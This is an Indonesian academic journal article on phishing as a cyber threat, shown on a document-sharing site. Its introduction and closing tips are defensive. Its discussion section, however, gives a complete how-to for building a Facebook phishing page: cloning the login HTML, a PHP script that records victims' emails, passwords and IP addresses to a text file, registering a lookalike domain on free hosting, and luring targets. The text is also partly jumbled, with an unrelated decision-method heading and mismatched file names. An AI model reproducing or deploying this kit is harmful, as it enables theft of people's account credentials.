Add to collection(s) Add to saved
  1. Rekayasa & Teknologi
  2. Perancangan web

phising sebagai salah satu bentuk ancaman dalam dunia cyber issn

advertisement 
ISSN : 1978-6603
PHISING SEBAGAI SALAH SATU BENTUK ANCAMAN DALAM DUNIA CYBER
Dian Rachmawati#1
#1
Program Studi Sistem Komputer, Universitas Sumatera Utara
Jl. Alumni no.9 Medan
Email : #[email protected]
Abstrak
Kejahatan di dunia siber adalah suatu kondisi yang terkait dengan aktivitas criminal dengan
menggunakan komputer atau jaringan komputer sebagai alat bantu dan juga sebagai target. Phising
adalah salah satu bentuk dari kejahatan elektronik dalam bentuk penipuan, dimana korban dipancing
dengan tujuan untuk mengambil semua informasi penting. Phising dapat terjadi pada siapa saja dari
lingkaran apapun. Phising bertujuan untuk mencuri data setelah memanipulasi seseorang dengan
tampilan situs web tertentu. Penipuan phising dapat dicegah. Pengguna harus berhati-hati ketika
mendapatkan email atau link mencurigakan.
Kata Kunci: Phising, Cyber Crime, Computer Security, Deface
Abstract
Cyber crimes is a term that refers to criminal activity with a computer or network of computers as
a tool and a target. Phishing is one form of electronic crime in the form of fraud, where the victim in
fishing to take all the important information. Phishing can happen to anyone of any circle. Phishing is to
steal data after defacing someone on view certain websites. Phishing scams can be prevented. User must
be careful when getting suspicious email or link.
Keywords :Phising , Cyber Crime , Computer Security, Deface
209
Dian Rachmawati, phising sebagai salah satu bentuk ancaman dalam dunia cyber
PENDAHULUAN
Dalam dunia komunikasi data global
dan perkembangan teknologi informasi yang
senantiasa
berubah
serta
cepatnya
perkembangan
software,
keamanan
merupakan suatu isu yang sangat penting,
baik itu keamanan fisik, data maupun aplikasi.
Masalah keamanan dankerahasiaan data
merupakan salah satu aspek penting dari
suatu sistem informasi.
Keamanan komputer adalah suatu
cabang teknologi yang dikenal dengan nama
keamanan informasi yang diterapkan pada
komputer. Sasaran keamanan komputer
antara lain adalah sebagai perlindungan
informasi terhadap pencurian atau korupsi,
atau pemeliharaan ketersediaan, seperti
dijabarkan dalam kebijakan keamanan.
Menurut Howard (1997) dalam bukunya “An
Analysis of security incidents on the internet’
menyatakan bahwa:
Keamanan komputer adalah tindakan
pencegahan
dari
serangan
pengguna
komputer atau pengakses jaringan yang tidak
bertanggung jawab.
Menurut Gollmann (2006) dalam
bukunya “Computer Security” menyatakan
bahwa:
Keamanan
komputer
adalah
berhubungan dengan pencegahan diri dan
deteksi terhadap tindakan pengganggu yang
tidak dikenali dalam sistem komputer.
Dalam keamanan sistem komputer
yang perlu dilakukan adalah untuk
mempersulit orang lain untuk mengganggu
sistem yang dipakai, baik itu menggunakan
komputer yang sifatnya stand alone, jaringan
local maupun jaringan global. Harus
memastikan sitem bisa berjalan dengan baik
dan kondusif (ditemukenali, 10 April 2014
Jurnal SAINTIKOM Vol. 13, No.3, September 2014
pada
http://www.it-artikel.com/
2012/04/artikel-hardware-komputer.html.
Menurut Garfinkel dan Spafford, ahli dalam
computer security, komputer dikatakan aman jika
bisa diandalkan dan perangkat lunaknya
bekerja sesuai dengan yang diharapkan.
Menurut Bruce (1996), Inti dari
keamanan komputer adalah melindungi
komputer dan jaringannya dengan tujuan
mengamankan informasi yang berada di
dalamnya. Keamanan komputer sendiri
meliputi beberapa aspek, antara lain:
1. Kerahasiaan (Confidentiality)
Layanan yang digunakan untuk
menjaga informasi
dari siapapun, kecuali yang memiliki
kunci rahasia atau otoritas untuk
membuka informasi yang telah
disandikan.
2. Integrity
Penjagaan atau perlindungan data dari
upaya pengubahan data secara tidak
sah. Untuk dapat menjaga keutuhan
data, suatu system harus dapat
mendeteksi manipulasi data dari pihakpihak yang tidak berhak antara lain
penyisipan,
penghapusan,
dan
pendistribusian data lain ke dalam data
yang asli.
3. Authentication
Berhubungan dengan identifikasi, baik
kesatuan system maupun informasi itu
sendiri. Dua pihak yang saling
berkomunikasi
harus
saling
memperkenalkan diri. Informasi yang
dikirimkan harus diautentikasi keaslian,
isi data, waktu pengiriman dan
sebagainya.
210
Dian Rachmawati, phising sebagai salah satu bentuk ancaman dalam dunia cyber
4. Non Repudiation
Merupakan usaha untuk mencegah
terjadinya penyangkalan terhadap
pengiriman/terciptanya
suatu
informasi
oleh
yang
mengirimkan/membuat,
juga
sebaliknya.
Dalam ruang lingkup keamanan
komputer, phising adalah salah bentuk
kejahatan elektronik dalam bentuk penipuan.
Dimana proses phising ini bermaksud untuk
menangkap informasi yang sangat sensitif
seperti username, password dan detil kartu
kredit dalam bentuk menyaru sebagai sebuah
entitas yang dapat dipercaya/ legitimate
organization dan biasanya berkomunikasi
secara elektronik.
Phising diperkenalkan pertama kali
pada tahun 1995. Menurut James (2005) cara
pertama yang dilakukan phisher adalah
dengan menggunakan algoritma yang
membuat nomor kartu kredit secara acak.
Jumlah kredit acak kartu yang digunakan
untuk membuat rekening AOL. Akun tersebut
kemudian digunakan untuk spam pengguna
lain dan untuk berbagai hal lainnya. Programprogram khusus seperti AOHell digunakan
untuk menyederhanakan proses. Praktek ini
diakhiri oleh AOL pada tahun 1995, ketika
perusahaan
membuat
langkah-langkah
keamanan untuk mencegah keberhasilan
penggunaan angka kredit secara acak kartu.
Phising dikenal juga sebagai “Brand
spoofing” atau “Carding” adalah sebuah
bentuk layanan yang menipu anda dengan
menjanjikan keabsahan dan keamanan
transfer data yang anda lakukan. Menurut
Felten et al spoofing (1997) dapat
didefinisikan sebagai “Teknik yang digunakan
untuk memperoleh akses yang tidak sah ke
suatu komputer atau informasi, dimana
211
penyerang berhubungan dengan pengguna
dengan berpura-pura memalsukan bahwa
mereka adalah host yang dapat dipercaya”.
TINJAUAN PUSTAKA
1.1 Cara Kerja Phising
Dari definisi phising dapat diketahui
cara kerja dari phising tersebut yang dilakukan
untuk menjebak korban oleh sang penjebak
(phisher). Phising yaitu aktivitas seseorang
untuk mendapatkan informasi rahasia user
dengan cara menggunakan email dan situs
web palsu yang tampilannya menyerupai
tampilan asli atau resmi web sebenarnya.
Informasi yang didapat atau dicari oleh
phiser adalah berupa password account atau
nomor kartu kredit korban. Penjebak
(phisher) menggunakan email, banner atau
pop-up window untuk menjebak user agar
mengarahkan ke situs web palsu (fake
webpage), dimana user diminta untuk
memberikan informasi pribadinya. Disinilah
phisher memanfaatkan kecerobohan dan
ketidak telitian user dalam web palsu
tersebut untuk mendapatkan informasi. Cara
kerja phising terlihat pada gambar 1:
Gambar 1 Cara Kerja dan Alur informasi
Phising
Jurnal SAINTIKOM Vol. 13, No.3, September 2014
Dian Rachmawati, phising sebagai salah satu bentuk ancaman dalam dunia cyber
Berikut ini adalah aspek-aspek ancaman yang
terinfeksi oleh virus phising:
1) Manipulasi Link
Sebagian teknik phising menggunakan
manipulasi link sehingga yang terlihat seperti
alamat dari institusi yang asli. URL yang salah
ejaannya atau penggunaan subdomain adalah
trik umum digunakan oleh phisher, seperti
contoh URL dibawah:
www.micosoft.com
www.mircosoft.com
www.verify-microsoft.com
dan bukannya www.microsoft.com
2) Filter Evasion
Phisher telah menggunakan gambar (bukan
teks) sehingga mengecoh pengguna sehingga
menyerahkan informasi pribadinya. Ini adalah
alasan Gmail atau Yahoo akan mematikan
gambar secara default untuk email yang
masuk.
Gambar 2 adalah salah satu contoh email
phising:
Gambar 2 Email Phising yang dihubungkan ke
sebuah halaman web
Untuk membuat e-mail phising tampak lebih
asli, para phisher/scammer akan meletakkan :
 Sebuah link yang dihubungkan ke halaman
web yang sah, tetapi sebenarnya
Jurnal SAINTIKOM Vol. 13, No.3, September 2014
membawa anda ke sebuah laman web
phising
 Atau mungkin pop-up yang tampak persis
seperti halaman resmi.
2.2
Teknik Phising
Dalam memancing korbannya seorang
phiser melakukan beberapa teknik antara lain:
1) Email Spoofing
Teknik ini biasa digunakan phiser dengan
mengirim email ke jutaan penggunaan
dengan me’nyaru’ berasal dari institusi
resmi. Biasanya email berisi pemintaan
nomor
kredit,
password
atau
mendownload form tertentu (Joshi,
2012:5).
2) Pengiriman Berbasis Web
Pengiriman berbasis web adalah salah
satu teknik Phising yang paling canggih.
Juga dikenal sebagai “man-in-themiddle”, hacker terletak diantara situs
web asli dan sistem phising.
3) Pesan Instan (chatting)
Olah pesan cepat adalah metode dimana
pengguna menerima pesan dengan link
yang mengarahkan mereka ke situs web
Phising palsu yang memiliki tampilan
yang sama dan merasa sebagai situs
yang sah.
4) Trojan hosts
Trojan hosts, hacker terlihat mencoba u
ntuk login ke account pengguna anda
untuk mengumpulkan
kredensial melalui mesin lokal. Informasi
yang diperoleh kemudian dikirim ke
phisher.
5) Manipulasi tautan (link)
Manipulasi link adalah teknik dimana
phisher mengirimkan link ke sebuah
212
Dian Rachmawati, phising sebagai salah satu bentuk ancaman dalam dunia cyber
website. Bila pengguna mengklik pada
link tersebut maka akan terbuka ke
website phisher bukan link website
sebenarnya.
6) Malware Phising
Penipuan phising melibatkan malware
memerlukan cara untuk dijalankan pada
komputer pengguna. Malware ini
biasanya melekat pada email yang
dikirimkan kepada pengguna oleh
phisher. Setelah korban mengklik pada
link maka malware akan mulai berfungsi.
Malware tersebut terkadang disertakan
pada file download.
Pembahasan
Phising dalam bentuk web spoofing
dapat dibuat menggunakan software MSFront Page, XAMPP, Notepad, serta
Dreamweaver.
Berikut penjelasan bagaimana cara
pembuatan Phising:
1. Tentukan
target
website
(dalam
pembahasan
ini
http://www.facebook.com/ )
2. Tekan CTRL+U (nanti akan tampil script).
3. Select all (CTRL+A), trus copy (CTRL+C),
pastekan(CTRL+V) di notepad.
4. Search (CTRL+F), lalu masukan.
action=https://www.facebook.com/login.p
hp?login_attempt=1
5. Ganti https://www.facebook.com/login.ph
p?login_attempt=1 dengan script.php
6. Save file tersebut dengan nama index.html
7. New file (CTRL+N)
8. Pastekan script berikut ini [9]
<?php
$file = "storage.txt";
213
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle,
"++++++++++++++++++++++++++++++++++
++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle,
"++++++++++++++++++++++++++++++++++
++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
<!-window.location=\"http://www.facebook.
com\";
// -->
</script>";
?></div>
</div>
</form>
9. Save file dengan nama script.php
10. New file (CTRL+N)
11. Ketik : Hasil Phising akan tersimpan disini
12. Save file dengan nama storage.txt
13. Upload file itu ke hostingan anda.
Misal idhostinger.com
Jurnal SAINTIKOM Vol. 13, No.3, September 2014
Dian Rachmawati, phising sebagai salah satu bentuk ancaman dalam dunia cyber
14. Untuk cara upload file ke hostingan,
lakukan cara berikut :
15. Buatlah akun pada idhostinger.com
16. Isi formulir pendaftaran dengan benar
sebagai contoh gambar 3
Gambar 4 Pemilihan Domain untuk Web Phising
Gambar 3 Formulir Pendaftaran
17. Jangan lupa check list "saya setuju dengan
ketentuan penggunaan layanan" lalu klik
"Buat Akun".
18. Setelah itu anda masuk ke akun email
anda untuk verifikasi akun hosting anda
19. Klik tautan yang ada di kotak masuk yahoo
anda untuk mengaktifkan akun hosting.
20. Kini akun anda sudah aktif dan anda akan
diarahkan
ke
http://cpanel.idhostinger.com/switcher.
Disitu anda klik "buat akun baru".
21. Pilih yang gratis (sebelah kiri) dan klik
"order!”
22. Selanjutnya, anda pilih domain dan isi
kolom tersebut. Kolom domain isikan
dengan domain (link) yang nantinya akan
dijadikan phising. Domain (link) pilih
dengan nama yang mirip dengan web yang
ingin diduplikasi terlihat pada gambar 4.
Jurnal SAINTIKOM Vol. 13, No.3, September 2014
23. Klik
"buat"
dan
tunggu
proses
pembuatannya.
24. Jika domain sudah dibuat, klik "beralih"
pada sebelah kanan
25. Kini anda berada pada cpanel domain
anda. Anda gulung kebawah scroll barnya.
Masuk ke file manager 3 terlihat
padagambar 5.
Gambar 5 Cpanel Domain
26. Selanjutnya anda masuk ke public html.
Nah silahkan anda upload ketiga file
phising tadi disitu dengan cara klik
"upload".
27. Klik "pilih file" untuk memilih script
phisingnya dan klik tanda cawang hijau
untuk upload pada gambar 6.
214
Dian Rachmawati, phising sebagai salah satu bentuk ancaman dalam dunia cyber
Gambar 6 Pemilihan Script Phising
28. Klik lagi tanda cawang hijaunya pada
gambar 7.
Gambar 8 Setting Chmod Direktori dan File
31. Klik tanda panah biru untuk kembali ke
public html.
32. Sekarang anda buka domain anda dan
jadilah phising facebook anda pada
gambar 9. Silahkan anda jebak target
anda untuk masuk ke web phising anda
dan suruh loginkan akun facebooknya
disitu. Alhasil email dan passwordnya
akan tersimpan di logs.tx
29. Selanjutnya klik tanda panah biru.
30. Jangan lupa ubah chmod/permissionnya
menjadi 777 dengan cara centang
"logs.txt" lalu klik "chmod pada gambar 8.
3. Metode Multifactor Evaluation
Process(MFEP)
Dalam metode MFEP ini pengambilan
keputusan dilakukan dengan memberikan
pertimbangan subyektif dan intuitif terhadap
Faktor yang dianggap penting. Pertimbanganpertimbangan tersebut berupa pemberian
bobot (weightingsystem) atas multifactor yang
terlibat dan dianggap penting tersebut.
215
Gambar 9 Halaman Phising Facebook
Simpulan
Phising adalah sebuah bentuk layanan
yang bersifat menipu dengan menjanjikan
keabsahan dan keamanan transfer data.
Berikut 10 tips Kaspersky Lab untuk mencegah
dari serangan phising:
1. Untuk situs sosial seperti Facebook, buat
bookmark untuk halaman login atau
Jurnal SAINTIKOM Vol. 13, No.3, September 2014
Dian Rachmawati, phising sebagai salah satu bentuk ancaman dalam dunia cyber
mengetik URL www.facebook.com secara
langsung di browser address bar.
2. Jangan mengklik link pada pesan email.
3. Hanya mengetik data rahasia pada website
yang aman.
4. Mengecek akun bank Anda secara regular
dan
melaporkan
apapun
yang
mencurigakan kepada bank Anda.
5. Kenali tanda giveaway yang ada dalam
email phising
a. Jika hal itu tidak ditujukan secara
personal kepada anda.
b. Jika
anda
bukan
satu-satunya
penerima email.
c. Jika terdapat kesalahan ejaan, tata
bahasa atau sintaks yang buruk atau
kekakuan lainnya dalam penggunaan
bahasa. Biasanya ini dilakukan
penyebar phising untuk mencegah
filtering.
6. Menginstall software untuk kemanan
internet dan tetap mengupdate antivirus.
7. Menginstall patch keamanan.
8. Waspada terhadap email dan pesan instan
yang tidak diminta.
9. Berhati-hati ketika login yang meminta hak
administrator. Cermati alamat URL-nya
yang ada di address bar.
10. Back up data anda.
DAFTAR PUSTAKA
Howard, J.1997. An Analysis of Security
Incidents on the Internet 1989-1995,
(PhD thesis). Engineering and Public
Policy: Carnegie Mellon University.
James, L. 2005. Phishing Exposed, MA:
Syngress. Maryland.
Preeti,
Emmanuel, Joshi. 2012.Forensic
Analysis of Email Date and Time
Spoofing, Proceedings of the 2012
Third International Conference on
Computer
and
Communication
Technology: India.
http://tekno.kompas.com/read/2009/05/27/1
7001058/10.Tips.Mencegah.Serangan.
Phising
http://ramadhanlmzero.blogspot.com/2013/0
2/cara-membuat-phisingfacebook.html
Web Spoofing: An Internet Con Game. Edward
W. Felten, Dirk Balfanz, Drew Dean,
and Dan S. Wallach, Technical Report:
540-96.
Department of Computer Science, Princeton
University, revised February 1997
(Original version: December 1996)
http://newsatthisblog.blogspot.com/2013/04/
cara-membuat-phising-facebook.html
http://www.it-artikel.com/2012/04/artikelhardware-komputer.html
Golmann, Dieter. 2006. Computer Security.
England: John Wiley.
Schneier, Bruce. 1996.Applied Cryptography:
Protocols, Algorithms, and Source Code
in C, 2nd ed, John Wiley & Son Inc: New
Jersey.
Jurnal SAINTIKOM Vol. 13, No.3, September 2014
216
Related documents
Power Point PHISING
Power Point PHISING
e-security - E-learning UPN JATIM
e-security - E-learning UPN JATIM
Web and Application Security
Web and Application Security
Sistem Informasi Komunitas Artikel Berbasis Web
Sistem Informasi Komunitas Artikel Berbasis Web
Tips Jika Email Yahoo tidak muncul Attachmen
Tips Jika Email Yahoo tidak muncul Attachmen
Belajar HTML lanjut
Belajar HTML lanjut
Prosedur Standar
Prosedur Standar
Perintah untuk mendaftar domain dan hosting gratis di my
Perintah untuk mendaftar domain dan hosting gratis di my
program aplikasi berbasis data microsoft acces
program aplikasi berbasis data microsoft acces
alur penerimaan peserta didik baru man pk
alur penerimaan peserta didik baru man pk
Kelompok Referensi adalah
Kelompok Referensi adalah
MATERI TIK tentang EMAIL LELY
MATERI TIK tentang EMAIL LELY
Download
advertisement